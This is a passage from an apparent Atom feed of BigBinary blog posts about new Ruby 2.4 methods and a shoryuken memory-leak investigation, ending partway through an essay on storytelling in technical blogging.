10.clamp(0, 5)
=&gt; 5</code></pre><h4>Clamping strings</h4><p>Similarly, strings can also be clamped within a range.</p><pre><code class="language-ruby">&quot;e&quot;.clamp(&quot;a&quot;, &quot;s&quot;)
=&gt; &quot;e&quot;
&quot;e&quot;.clamp(&quot;f&quot;, &quot;s&quot;)
=&gt; &quot;f&quot;
&quot;e&quot;.clamp(&quot;a&quot;, &quot;c&quot;)
=&gt; &quot;c&quot;
&quot;this&quot;.clamp(&quot;thief&quot;, &quot;thin&quot;)
=&gt; &quot;thin&quot;</code></pre><p>Internally, this method relies on applying the <a href="https://en.wikipedia.org/wiki/Three-way_comparison">spaceship &lt;=&gt; operator</a> between the object and the min &amp; max arguments, roughly like this:</p><pre><code class="language-ruby">if (x &lt;=&gt; min) &lt; 0 then min
elsif (x &lt;=&gt; max) &gt; 0 then max
else x
end</code></pre>]]></content>
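On Rubies older than 2.4, the same behavior can be expressed with `min`/`max`. This is a sketch under the assumption that both values respond to the spaceship operator; `my_clamp` is a hypothetical helper name, not a standard method.

```ruby
# Pre-2.4 sketch of Comparable#clamp: pull the value up to min,
# then push it down to max.
def my_clamp(x, min, max)
  [[x, min].max, max].min
end

puts my_clamp(10, 5, 20)      # prints 10
puts my_clamp(10, 15, 20)     # prints 15
puts my_clamp("e", "a", "c")  # prints c
```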
    </entry><entry>
       <title><![CDATA[New liberal_parsing option for parsing bad CSV data]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-introduces-liberal_parsing-option-for-parsing-bad-csv-data"/>
      <updated>2016-11-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-introduces-liberal_parsing-option-for-parsing-bad-csv-data</id>
      <content type="html"><![CDATA[<p>Comma-Separated Values (CSV) is a widely used data format, and almost every language has a module to parse it. In Ruby, we have the <a href="http://ruby-doc.org/stdlib-2.3.2/libdoc/csv/rdoc/CSV.html">CSV class</a> to do that.</p><p>According to <a href="https://tools.ietf.org/html/rfc4180#page-4">RFC 4180</a>, we cannot have unescaped double quotes in CSV input, since such data can't be parsed.</p><p>We get a <code>MalformedCSVError</code> when the CSV data does not conform to RFC 4180.</p><p>Ruby 2.4 has added a <a href="https://bugs.ruby-lang.org/issues/11839">liberal parsing option</a> to parse such bad data. When it is set to <code>true</code>, Ruby will try to parse the data even when it does not conform to RFC 4180.</p><pre><code class="language-ruby"># Before Ruby 2.4
&gt; CSV.parse_line('one,two&quot;,three,four')
CSV::MalformedCSVError: Illegal quoting in line 1.

# With Ruby 2.4
&gt; CSV.parse_line('one,two&quot;,three,four', liberal_parsing: true)
=&gt; [&quot;one&quot;, &quot;two\&quot;&quot;, &quot;three&quot;, &quot;four&quot;]</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Passing block with Enumerable#chunk not mandatory in Ruby 2.4]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/passing-block-with-enumerable-chunk-is-not-mandatory-in-ruby-2-4"/>
      <updated>2016-11-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/passing-block-with-enumerable-chunk-is-not-mandatory-in-ruby-2-4</id>
      <content type="html"><![CDATA[<p>The <a href="https://ruby-doc.org/core-2.3.2/Enumerable.html#method-i-chunk">Enumerable#chunk</a> method can be used on an enumerable object to group consecutive items based on the value returned from the block passed to it.</p><pre><code class="language-ruby">[1, 4, 7, 10, 2, 6, 15].chunk { |item| item &gt; 5 }.each { |values| p values }
=&gt; [false, [1, 4]]
[true, [7, 10]]
[false, [2]]
[true, [6, 15]]</code></pre><p>Prior to Ruby 2.4, passing a block to the <code>chunk</code> method was mandatory.</p><pre><code class="language-ruby">array = [1, 2, 3, 4, 5, 6]
array.chunk
=&gt; ArgumentError: no block given</code></pre><h3>Enumerable#chunk without block in Ruby 2.4</h3><p>In Ruby 2.4, we are able to use <a href="https://bugs.ruby-lang.org/issues/2172">chunk without passing a block</a>. It just returns an enumerator object which we can use to chain further operations.</p><pre><code class="language-ruby">array = [1, 2, 3, 4, 5, 6]
array.chunk
=&gt; &lt;Enumerator: [1, 2, 3, 4, 5, 6]:chunk&gt;</code></pre><h3>Reasons for this change</h3><p>Let's take the <a href="http://stackoverflow.com/questions/8621733/how-do-i-summarize-array-of-integers-as-an-array-of-ranges">case of listing</a> consecutive integers in an array as ranges.</p><pre><code class="language-ruby"># Before Ruby 2.4
integers = [1, 2, 4, 5, 6, 7, 9, 13]
integers.enum_for(:chunk).with_index { |x, idx| x - idx }.map do |diff, group|
  [group.first, group.last]
end
=&gt; [[1, 2], [4, 7], [9, 9], [13, 13]]</code></pre><p>We had to use <a href="http://ruby-doc.org/core-2.3.2/Object.html#method-i-enum_for">enum_for</a> here, as <code>chunk</code> can't be called without a block.</p><p><code>enum_for</code> creates a new enumerator object which will enumerate by calling the method passed to it. In this case the method passed was <code>chunk</code>.</p><p>With Ruby 2.4, we can use the <code>chunk</code> method directly without <code>enum_for</code>, as it no longer requires a block.</p><pre><code class="language-ruby"># Ruby 2.4
integers = [1, 2, 4, 5, 6, 7, 9, 13]
integers.chunk.with_index { |x, idx| x - idx }.map do |diff, group|
  [group.first, group.last]
end
=&gt; [[1, 2], [4, 7], [9, 9], [13, 13]]</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 unifies Fixnum and Bignum into Integer]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-unifies-fixnum-and-bignum-into-integer"/>
      <updated>2016-11-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-unifies-fixnum-and-bignum-into-integer</id>
      <content type="html"><![CDATA[<p>Ruby uses the <code>Fixnum</code> class for representing small numbers and the <code>Bignum</code> class for big numbers.</p><pre><code class="language-ruby"># Before Ruby 2.4
1.class         #=&gt; Fixnum
(2 ** 62).class #=&gt; Bignum</code></pre><p>In general routine work we don't have to worry about whether the number we are dealing with is a <code>Bignum</code> or a <code>Fixnum</code>. It's just an implementation detail.</p><p>Interestingly, Ruby also has the <code>Integer</code> class, which is the superclass of <code>Fixnum</code> and <code>Bignum</code>.</p><p>Starting with Ruby 2.4, Fixnum and Bignum <a href="https://bugs.ruby-lang.org/issues/12005">are unified into Integer</a>.</p><pre><code class="language-ruby"># Ruby 2.4
1.class         #=&gt; Integer
(2 ** 62).class #=&gt; Integer</code></pre><p>Starting with Ruby 2.4, usage of the Fixnum and Bignum constants <a href="https://bugs.ruby-lang.org/issues/12739">is deprecated</a>.</p><pre><code class="language-ruby"># Ruby 2.4
&gt;&gt; Fixnum
(irb):6: warning: constant ::Fixnum is deprecated
=&gt; Integer
&gt;&gt; Bignum
(irb):7: warning: constant ::Bignum is deprecated
=&gt; Integer</code></pre><h2>How to know if a number is Fixnum, Bignum or Integer?</h2><p>We don't have to worry about this change most of the time in our application code. But libraries like Rails use the class of numbers for taking certain decisions. These libraries need to support both Ruby 2.4 and previous versions of Ruby.</p><p>The easiest way to know whether the Ruby version is using integer unification or not is to check the class of 1.</p><pre><code class="language-ruby"># Ruby 2.4
1.class #=&gt; Integer

# Before Ruby 2.4
1.class #=&gt; Fixnum</code></pre><p>Look at <a href="https://github.com/rails/rails/pull/25056">PR #25056</a> to see how Rails is handling this case.</p><p>Similarly, Arel is <a href="https://github.com/rails/arel/commit/dc85a6e9c74942945ad696f5da4d82490a85b865">also supporting</a> both Ruby 2.4 and previous versions of Ruby.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 implements Array#min and Array#max]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-implements-array-min-and-max"/>
      <updated>2016-11-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-implements-array-min-and-max</id>
      <content type="html"><![CDATA[<p>Ruby has <code>Enumerable#min</code> and <code>Enumerable#max</code>, which can be used to find the minimum and the maximum value in an Array.</p><pre><code class="language-ruby">(1..10).to_a.max
#=&gt; 10
(1..10).to_a.method(:max)
#=&gt; #&lt;Method: Array(Enumerable)#max&gt;</code></pre><p>Ruby 2.4 adds <a href="https://bugs.ruby-lang.org/issues/12172">Array#min and Array#max</a>, which are much faster than <code>Enumerable#max</code> and <code>Enumerable#min</code>.</p><p>The following benchmark is based on <a href="https://blog.blockscore.com/new-features-in-ruby-2-4">https://blog.blockscore.com/new-features-in-ruby-2-4</a>.</p><pre><code class="language-ruby">Benchmark.ips do |bench|
  NUM1 = 1_000_000.times.map { rand }
  NUM2 = NUM1.dup

  ENUM_MAX = Enumerable.instance_method(:max).bind(NUM1)
  ARRAY_MAX = Array.instance_method(:max).bind(NUM2)

  bench.report('Enumerable#max') do
    ENUM_MAX.call
  end

  bench.report('Array#max') do
    ARRAY_MAX.call
  end

  bench.compare!
end

Warming up --------------------------------------
      Enumerable#max     1.000  i/100ms
           Array#max     2.000  i/100ms
Calculating -------------------------------------
      Enumerable#max     17.569  ( 5.7%) i/s -     88.000  in   5.026996s
           Array#max     26.703  ( 3.7%) i/s -    134.000  in   5.032562s

Comparison:
           Array#max:       26.7 i/s
      Enumerable#max:       17.6 i/s - 1.52x  slower

Benchmark.ips do |bench|
  NUM1 = 1_000_000.times.map { rand }
  NUM2 = NUM1.dup

  ENUM_MIN = Enumerable.instance_method(:min).bind(NUM1)
  ARRAY_MIN = Array.instance_method(:min).bind(NUM2)

  bench.report('Enumerable#min') do
    ENUM_MIN.call
  end

  bench.report('Array#min') do
    ARRAY_MIN.call
  end

  bench.compare!
end

Warming up --------------------------------------
      Enumerable#min     1.000  i/100ms
           Array#min     2.000  i/100ms
Calculating -------------------------------------
      Enumerable#min     18.621  ( 5.4%) i/s -     93.000  in   5.007244s
           Array#min     26.902  ( 3.7%) i/s -    136.000  in   5.064815s

Comparison:
           Array#min:       26.9 i/s
      Enumerable#min:       18.6 i/s - 1.44x  slower</code></pre><p>This benchmark shows that the new methods <code>Array#max</code> and <code>Array#min</code> are about 1.5 times faster than <code>Enumerable#max</code> and <code>Enumerable#min</code>.</p><p>Similar to <code>Enumerable#max</code> and <code>Enumerable#min</code>, <code>Array#max</code> and <code>Array#min</code> also assume that the objects use the <a href="https://ruby-doc.org/core-2.3.2/Comparable.html">Comparable</a> mixin to define the <code>spaceship &lt;=&gt;</code> operator for comparing the elements.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Hunting down a memory leak in shoryuken]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/hunting-down-a-memory-leak-in-shoryuken"/>
      <updated>2016-11-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/hunting-down-a-memory-leak-in-shoryuken</id>
      <content type="html"><![CDATA[<p>This is a story of how we found and fixed a memory leak in <a href="https://github.com/phstc/shoryuken/">shoryuken</a>.</p><p>We use shoryuken to process SQS messages inside of docker containers. A while back we noticed that memory was growing without bound. After every few days, we had to restart all the docker containers as a temporary workaround.</p><p>Since the workers were inside of a docker container, we had limited tools. So we went ahead with the UNIX way of investigating the issue.</p><p>First we noticed that the number of threads inside the worker was high, 115 in our case. shoryuken boots up all the worker threads at <a href="https://github.com/phstc/shoryuken/blob/cea4f5f475b2e756f82e367152db831f9e2cc6f5/lib/shoryuken/manager.rb#L22">startup</a>.</p><pre><code class="language-ruby"># ps --no-header uH p &lt;PID&gt; | wc -l
#=&gt; 115</code></pre><p>The proc filesystem exposes a lot of useful information about all the running processes. The <code>/proc/[pid]/task</code> directory has information about all the threads of a process.</p><p>Some of the threads with lower IDs were executing syscall 23 <a href="http://man7.org/linux/man-pages/man2/select.2.html">(select)</a> and 271 <a href="https://linux.die.net/man/2/ppoll">(ppoll)</a>. These threads were waiting for a message to arrive in the SQS queue, but most of the threads were executing syscall 202 <a href="http://man7.org/linux/man-pages/man2/futex.2.html">(futex)</a>.</p><p>At this point we had an idea about the root cause of the memory leak: it was due to the worker starting a lot of threads which were not getting terminated. We wanted to know how and when these threads were started.</p><p>Ruby 2.0.0 introduced <a href="http://ruby-doc.org/core-2.0.0/TracePoint.html">TracePoint</a>, which provides an interface to a lot of internal Ruby events, like when an exception is raised, when a method is called, when a method returns, etc.</p><p>We added the following code to our workers.</p><pre><code class="language-ruby">tc = TracePoint.new(:thread_begin, :thread_end) do |tp|
  puts tp.event
  puts tp.self.class
end
tc.enable</code></pre><p>Executing the Ruby workers with tracing enabled revealed that a new <code>Celluloid::Thread</code> was being created before each message was processed and that thread was never terminated. Hence the number of zombie threads in the worker was growing with the number of messages processed.</p><pre><code class="language-ruby">thread_begin
Celluloid::Thread
[development] [306203a5-3c07-4174-b974-77390e8a4fc3] SQS Message: ...snip...
thread_begin
Celluloid::Thread
[development] [2ce2ed3b-d314-46f1-895a-f1468a8db71e] SQS Message: ...snip...</code></pre><p>Unfortunately TracePoint didn't pinpoint the place where the thread was started, hence we added a couple of puts statements to investigate the issue further.</p><p>After a lot of debugging, we were able to find that a new thread was started to increase the <a href="https://github.com/phstc/shoryuken/blob/a40e6b26e2dfbc4a78a36198d02010dce66a977e/lib/shoryuken/middleware/server/auto_extend_visibility.rb#L48">visibility time</a> of the SQS message in a shoryuken middleware when auto_visibility_timeout was true.</p><p>The fix was to <a href="https://github.com/phstc/shoryuken/pull/267">terminate</a> the thread after the work is done.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 Extracting captured data from Regexp results]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-adds-better-support-for-extracting-captured-data-from-regexp-match-results"/>
      <updated>2016-11-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-adds-better-support-for-extracting-captured-data-from-regexp-match-results</id>
      <content type="html"><![CDATA[<p>Ruby has the <a href="https://ruby-doc.org/core-2.2.0/MatchData.html">MatchData</a> type, which is returned by <code>Regexp#match</code> and <code>Regexp.last_match</code>.</p><p>It has the methods <code>#names</code> and <code>#captures</code> to return the names used for capturing and the actual captured data respectively.</p><pre><code class="language-ruby">pattern = /(?&lt;number&gt;\d+) (?&lt;word&gt;\w+)/
match_data = pattern.match('100 thousand')
#=&gt; #&lt;MatchData &quot;100 thousand&quot; number:&quot;100&quot; word:&quot;thousand&quot;&gt;

&gt;&gt; match_data.names
=&gt; [&quot;number&quot;, &quot;word&quot;]
&gt;&gt; match_data.captures
=&gt; [&quot;100&quot;, &quot;thousand&quot;]</code></pre><p>If we want all named captures as key-value pairs, we have to combine the results of names and captures.</p><pre><code class="language-ruby">match_data.names.zip(match_data.captures).to_h
#=&gt; {&quot;number&quot;=&gt;&quot;100&quot;, &quot;word&quot;=&gt;&quot;thousand&quot;}</code></pre><p>Ruby 2.4 adds <a href="https://bugs.ruby-lang.org/issues/11999"><code>#named_captures</code></a>, which returns both the names and data of the capture groups.</p><pre><code class="language-ruby">pattern = /(?&lt;number&gt;\d+) (?&lt;word&gt;\w+)/
match_data = pattern.match('100 thousand')
match_data.named_captures
#=&gt; {&quot;number&quot;=&gt;&quot;100&quot;, &quot;word&quot;=&gt;&quot;thousand&quot;}</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 Regexp#match? not polluting global variables]]></title>
       <author><name>Rohit Kumar</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-implements-regexp-match-without-polluting-global-variables"/>
      <updated>2016-11-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-implements-regexp-match-without-polluting-global-variables</id>
      <content type="html"><![CDATA[<p>Ruby has many ways to match with a regular expression.</p><h3>Regexp#===</h3><p>It returns true/false and sets the <code>$~</code> global variable.</p><pre><code class="language-ruby">/stat/ === &quot;case statements&quot;
#=&gt; true
$~
#=&gt; #&lt;MatchData &quot;stat&quot;&gt;</code></pre><h3>Regexp#=~</h3><p>It returns the integer position at which the match starts, or nil if there is no match. It also sets the <code>$~</code> global variable.</p><pre><code class="language-ruby">/stat/ =~ &quot;case statements&quot;
#=&gt; 5
$~
#=&gt; #&lt;MatchData &quot;stat&quot;&gt;</code></pre><h3>Regexp#match</h3><p>It returns match data and also sets the <code>$~</code> global variable.</p><pre><code class="language-ruby">/stat/.match(&quot;case statements&quot;)
#=&gt; #&lt;MatchData &quot;stat&quot;&gt;
$~
#=&gt; #&lt;MatchData &quot;stat&quot;&gt;</code></pre><h3>Ruby 2.4 adds Regexp#match?</h3><p><a href="https://bugs.ruby-lang.org/issues/8110">This new method</a> just returns true/false and does not set any global variables.</p><pre><code class="language-ruby">/case/.match?(&quot;case statements&quot;)
#=&gt; true</code></pre><p>So <code>Regexp#match?</code> is a good option when we are only concerned with whether the regex matches or not.</p><p><code>Regexp#match?</code> is also faster than its counterparts, as it reduces object allocation by not creating a back reference and not changing <code>$~</code>.</p><pre><code class="language-ruby">require 'benchmark/ips'

Benchmark.ips do |bench|
  EMAIL_ADDR = 'disposable.style.email.with+symbol@example.com'
  EMAIL_REGEXP_DEVISE = /\A[^@\s]+@([^@\s]+\.)+[^@\W]+\z/

  bench.report('Regexp#===') do
    EMAIL_REGEXP_DEVISE === EMAIL_ADDR
  end

  bench.report('Regexp#=~') do
    EMAIL_REGEXP_DEVISE =~ EMAIL_ADDR
  end

  bench.report('Regexp#match') do
    EMAIL_REGEXP_DEVISE.match(EMAIL_ADDR)
  end

  bench.report('Regexp#match?') do
    EMAIL_REGEXP_DEVISE.match?(EMAIL_ADDR)
  end

  bench.compare!
end

#=&gt; Warming up --------------------------------------
#=&gt;          Regexp#===   103.876k i/100ms
#=&gt;           Regexp#=~   105.843k i/100ms
#=&gt;        Regexp#match    58.980k i/100ms
#=&gt;       Regexp#match?   107.287k i/100ms
#=&gt; Calculating -------------------------------------
#=&gt;          Regexp#===      1.335M ( 9.5%) i/s -      6.648M in   5.038568s
#=&gt;           Regexp#=~      1.369M ( 6.7%) i/s -      6.880M in   5.049481s
#=&gt;        Regexp#match    709.152k ( 5.4%) i/s -      3.539M in   5.005514s
#=&gt;       Regexp#match?      1.543M ( 4.6%) i/s -      7.725M in   5.018696s
#=&gt;
#=&gt; Comparison:
#=&gt;       Regexp#match?:  1542589.9 i/s
#=&gt;           Regexp#=~:  1369421.3 i/s - 1.13x  slower
#=&gt;          Regexp#===:  1335450.3 i/s - 1.16x  slower
#=&gt;        Regexp#match:   709151.7 i/s - 2.18x  slower</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Ruby 2.4 implements Enumerable#sum]]></title>
       <author><name>Mohit Natoo</name></author>
      <link href="https://www.bigbinary.com/blog/ruby-2-4-introduces-enumerable-sum"/>
      <updated>2016-11-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/ruby-2-4-introduces-enumerable-sum</id>
      <content type="html"><![CDATA[<p>It is a common use case to calculate the sum of the elements of an array or of the values from a hash.</p><pre><code class="language-ruby">[1, 2, 3, 4] =&gt; 10
{a: 1, b: 6, c: -3} =&gt; 4</code></pre><p>Active Support already implements <a href="https://github.com/rails/rails/blob/3d716b9e66e334c113c98fb3fc4bcf8a945b93a1/activesupport/lib/active_support/core_ext/enumerable.rb#L2-L27">Enumerable#sum</a>.</p><pre><code class="language-ruby">&gt; [1, 2, 3, 4].sum #=&gt; 10
&gt; {a: 1, b: 6, c: -3}.sum { |k, v| v**2 } #=&gt; 46
&gt; ['foo', 'bar'].sum # concatenation of strings #=&gt; &quot;foobar&quot;
&gt; [[1], ['abc'], [6, 'qwe']].sum # concatenation of arrays #=&gt; [1, &quot;abc&quot;, 6, &quot;qwe&quot;]</code></pre><p>Until Ruby 2.3, we had to use Active Support to use the <code>Enumerable#sum</code> method, or we could use <code>#inject</code>, which is <a href="https://github.com/rails/rails/blob/3d716b9e66e334c113c98fb3fc4bcf8a945b93a1/activesupport/lib/active_support/core_ext/enumerable.rb#L2-L27">used by Active Support under the hood</a>.</p><p>Ruby 2.4.0 implements <a href="https://github.com/ruby/ruby/commit/41ef7ec381338a97d15a6b4b18acd8b426a9ce79">Enumerable#sum</a> as <a href="https://bugs.ruby-lang.org/issues/12217">part of the language</a> itself.</p><p>Let's take a look at how the <code>sum</code> method fares on some of the enumerable objects in Ruby 2.4.</p><pre><code class="language-ruby">&gt; [1, 2, 3, 4].sum #=&gt; 10
&gt; {a: 1, b: 6, c: -3}.sum { |k, v| v**2 } #=&gt; 46
&gt; ['foo', 'bar'].sum #=&gt; TypeError: String can't be coerced into Integer
&gt; [[1], ['abc'], [6, 'qwe']].sum #=&gt; TypeError: Array can't be coerced into Integer</code></pre><p>As we can see, the behavior of <code>Enumerable#sum</code> in Ruby 2.4 is the same as that of Active Support in the case of numbers, but not in the case of string or array concatenation. Let's see what the difference is and how we can make it work in Ruby 2.4 as well.</p><h3>Understanding the addition/concatenation identity</h3><p>The <code>Enumerable#sum</code> method takes an optional argument which acts as an accumulator. Both Active Support and Ruby 2.4 accept this argument.</p><p>When the identity argument is not passed, <code>0</code> is used as the default accumulator in Ruby 2.4, whereas Active Support uses <code>nil</code> as the default accumulator.</p><p>Hence, in the cases of string and array concatenation, the error occurred in Ruby because the code attempts to add a string and an array respectively to <code>0</code>.</p><p>To overcome this, we need to pass a proper addition/concatenation identity as an argument to the <code>sum</code> method.</p><p>The addition/concatenation identity of an object can be defined as the value with which calling the <code>+</code> operation on the object returns the same object.</p><pre><code class="language-ruby">&gt; ['foo', 'bar'].sum('') #=&gt; &quot;foobar&quot;
&gt; [[1], ['abc'], [6, 'qwe']].sum([]) #=&gt; [1, &quot;abc&quot;, 6, &quot;qwe&quot;]</code></pre><h3>What about Rails?</h3><p>As we have seen earlier, Ruby 2.4 implements <code>Enumerable#sum</code> favouring numeric operations while also supporting non-numeric callers via the identity element. This behavior is not entirely the same as that of Active Support. But Active Support can still make use of the native sum method whenever possible. There is already a <a href="https://github.com/rails/rails/pull/25202">pull request</a> open which uses <code>Enumerable#sum</code> from Ruby whenever possible. This will help gain some performance boost, as Ruby's method is implemented natively in C whereas that in Active Support is implemented in Ruby.</p>]]></content>
    </entry><entry>
       <title><![CDATA[String#concat, Array#concat & String#prepend Ruby 2.4]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/string-array-concat-and-string-prepend-take-multiple-arguments-in-ruby-2-4"/>
      <updated>2016-10-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/string-array-concat-and-string-prepend-take-multiple-arguments-in-ruby-2-4</id>
      <content type="html"><![CDATA[<p>In Ruby, we use <code>#concat</code> to append a string to another string or an element to an array. We can also use <code>#prepend</code> to add a string at the beginning of a string.</p><h3>Ruby 2.3</h3><h4>String#concat and Array#concat</h4><pre><code class="language-ruby">string = &quot;Good&quot;
string.concat(&quot; morning&quot;)
#=&gt; &quot;Good morning&quot;

array = ['a', 'b', 'c']
array.concat(['d'])
#=&gt; [&quot;a&quot;, &quot;b&quot;, &quot;c&quot;, &quot;d&quot;]</code></pre><h4>String#prepend</h4><pre><code class="language-ruby">string = &quot;Morning&quot;
string.prepend(&quot;Good &quot;)
#=&gt; &quot;Good Morning&quot;</code></pre><p>Before Ruby 2.4, we could pass only one argument to these methods. So we could not add multiple items in one shot.</p><pre><code class="language-ruby">string = &quot;Good&quot;
string.concat(&quot; morning&quot;, &quot; to&quot;, &quot; you&quot;)
#=&gt; ArgumentError: wrong number of arguments (given 3, expected 1)</code></pre><h3>Changes with Ruby 2.4</h3><p>In Ruby 2.4, we can pass multiple arguments and Ruby processes each argument one by one.</p><h4>String#concat and Array#concat</h4><pre><code class="language-ruby">string = &quot;Good&quot;
string.concat(&quot; morning&quot;, &quot; to&quot;, &quot; you&quot;)
#=&gt; &quot;Good morning to you&quot;

array = ['a', 'b']
array.concat(['c'], ['d'])
#=&gt; [&quot;a&quot;, &quot;b&quot;, &quot;c&quot;, &quot;d&quot;]</code></pre><h4>String#prepend</h4><pre><code class="language-ruby">string = &quot;you&quot;
string.prepend(&quot;Good &quot;, &quot;morning &quot;, &quot;to &quot;)
#=&gt; &quot;Good morning to you&quot;</code></pre><p>These methods work even when no argument is passed, unlike in previous versions of Ruby.</p><pre><code class="language-ruby">&quot;Good&quot;.concat
#=&gt; &quot;Good&quot;</code></pre><h4>Difference between <code>concat</code> and the shovel <code>&lt;&lt;</code> operator</h4><p>Though the shovel <code>&lt;&lt;</code> operator can be used interchangeably with <code>concat</code> when we are calling it once, there is a difference in behavior when calling it multiple times.</p><pre><code class="language-ruby">str = &quot;Ruby&quot;
str &lt;&lt; str
str
#=&gt; &quot;RubyRuby&quot;

str = &quot;Ruby&quot;
str.concat str
str
#=&gt; &quot;RubyRuby&quot;

str = &quot;Ruby&quot;
str &lt;&lt; str &lt;&lt; str
#=&gt; &quot;RubyRubyRubyRuby&quot;

str = &quot;Ruby&quot;
str.concat str, str
str
#=&gt; &quot;RubyRubyRuby&quot;</code></pre><p>So <code>concat</code> with multiple arguments appends the <em>present</em> content of the caller for each argument, as the arguments are evaluated before any appending happens. Whereas calling <code>&lt;&lt;</code> twice is just a sequence of binary operations, so the argument for the second call is the output of the first <code>&lt;&lt;</code> operation.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Hash#compact and Hash#compact! now part of Ruby 2.4]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/hash-compact-and-hash-compact-now-part-of-ruby-2-4"/>
      <updated>2016-10-24T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/hash-compact-and-hash-compact-now-part-of-ruby-2-4</id>
      <content type="html"><![CDATA[<p>It is a common use case to remove the <code>nil</code> values from a hash in Ruby.</p><pre><code class="language-ruby">{ &quot;name&quot; =&gt; &quot;prathamesh&quot;, &quot;email&quot; =&gt; nil }
=&gt; { &quot;name&quot; =&gt; &quot;prathamesh&quot; }</code></pre><p>Active Support already has a solution for this in the form of <a href="http://api.rubyonrails.org/classes/Hash.html#method-i-compact">Hash#compact</a> and <a href="http://api.rubyonrails.org/classes/Hash.html#method-i-compact-21">Hash#compact!</a>.</p><pre><code class="language-ruby">hash = { &quot;name&quot; =&gt; &quot;prathamesh&quot;, &quot;email&quot; =&gt; nil }

hash.compact  #=&gt; { &quot;name&quot; =&gt; &quot;prathamesh&quot; }
hash          #=&gt; { &quot;name&quot; =&gt; &quot;prathamesh&quot;, &quot;email&quot; =&gt; nil }

hash.compact! #=&gt; { &quot;name&quot; =&gt; &quot;prathamesh&quot; }
hash          #=&gt; { &quot;name&quot; =&gt; &quot;prathamesh&quot; }</code></pre><p>Now, Ruby 2.4 will have these 2 methods in the <a href="https://bugs.ruby-lang.org/issues/11818">language</a> <a href="https://bugs.ruby-lang.org/issues/12863">itself</a>, so even those not using Rails or Active Support will be able to use them. Additionally, it will also give a performance boost over the Active Support versions, because these methods are now implemented natively in C, whereas the Active Support versions are in Ruby.</p><p>There is already a <a href="https://github.com/rails/rails/pull/26868">pull request open</a> in Rails to use the native versions of these methods from Ruby 2.4 whenever available, so that we get the performance boost.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 blogs and the art of story telling]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-blogs-and-the-art-of-story-telling"/>
      <updated>2016-09-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-blogs-and-the-art-of-story-telling</id>
      <content type="html"><![CDATA[<p>Between October 31, 2015 and September 5, 2016 we wrote 80 blog posts on changes in <a href="/blog/categories/Rails-5">Rails 5</a>.</p><p>Producing a blog post every 4 days consistently over 310 days takes persistence and time - lots of it.</p><p>We needed to go through all the commits, pick the ones which are worth writing about, and then write about them. Going into this I knew it would be a hard task. Ruby on Rails is now a well crafted machine. In order to fully understand what's going on in the code base we need to spend sufficient time on it.</p><p>However, I was surprised by the thing that turned out to be the hardest - telling the story of the code change.</p><p>Every commit has a story. There is a reason for it. The commit itself might be minor, but the code change in itself does not tell the full story.</p><p>For example, take <a href="https://github.com/rails/rails/commit/a71350cae0082193ad8c66d65ab62e8bb0b7853b">this commit</a>. This commit is so simple that you might think it is not worth writing about. However, in order to fully understand what it does we need to tell the full story, which was captured in <a href="rails-5-disables-autoloading-after-booting-the-app-in-production">this blog</a>.</p><p>Or take the case of <a href="rails-5-official-supports-mariadb">Rails 5 officially supports MariaDB</a>. The blog captures the full story and not just the code that changed.</p><p>Now you might say that I have cherry-picked blog posts that favor my case. So let's pick a blog <a href="skip-mailers-while-generating-rails-5-app">which is simple</a>.</p><p>You might wonder what could go wrong with a blog like this. As it turns out, plenty. That's because writing a blog also requires defining the boundary of the blog. Deciding what to include and what to leave out is hard. One gets a feel for it only after writing it. And after having typed the words on screen, <a href="https://m.signalvnoise.com/the-writing-class-id-like-to-teach-11b259f44a5d#.mk324kxym">pruning is hard</a>.</p><p>A well-written article reads simply. The problem with articles that are simple for readers is that - well, they are simple. So readers feel that writing them must have been simple. Nothing could be further from the truth. It takes a lot of hard work to produce anything simple. It's true in writing. And it's true in producing software.</p><p>Coming back to the &quot;Skipping Mailer&quot; blog, it took quite a bit of back and forth to bring the blog to its essence. So yes, the final output is quite short, but that does not mean it took a short amount of time to produce.</p><h2>Tell a story even if you have 10 seconds</h2><p>John Lasseter was working as an animator at Disney in 1984, when he was fired for promoting computer animation there. Lasseter then joined Lucasfilm, whose computer graphics group was renamed Pixar and sold to Steve Jobs for $5 million.</p><p>Lasseter was tasked with producing a short film that would show the power of what computer animation could do, so that Pixar could get some projects, like producing TV commercials with cartoon characters, and earn some money. He needed to produce a short film for the upcoming computer graphics animation conference.</p><p>His initial idea was a short movie with a plotless character. He presented this idea at a conference in Brussels. There, Belgian animator Raoul Servais commented in a slightly harsh 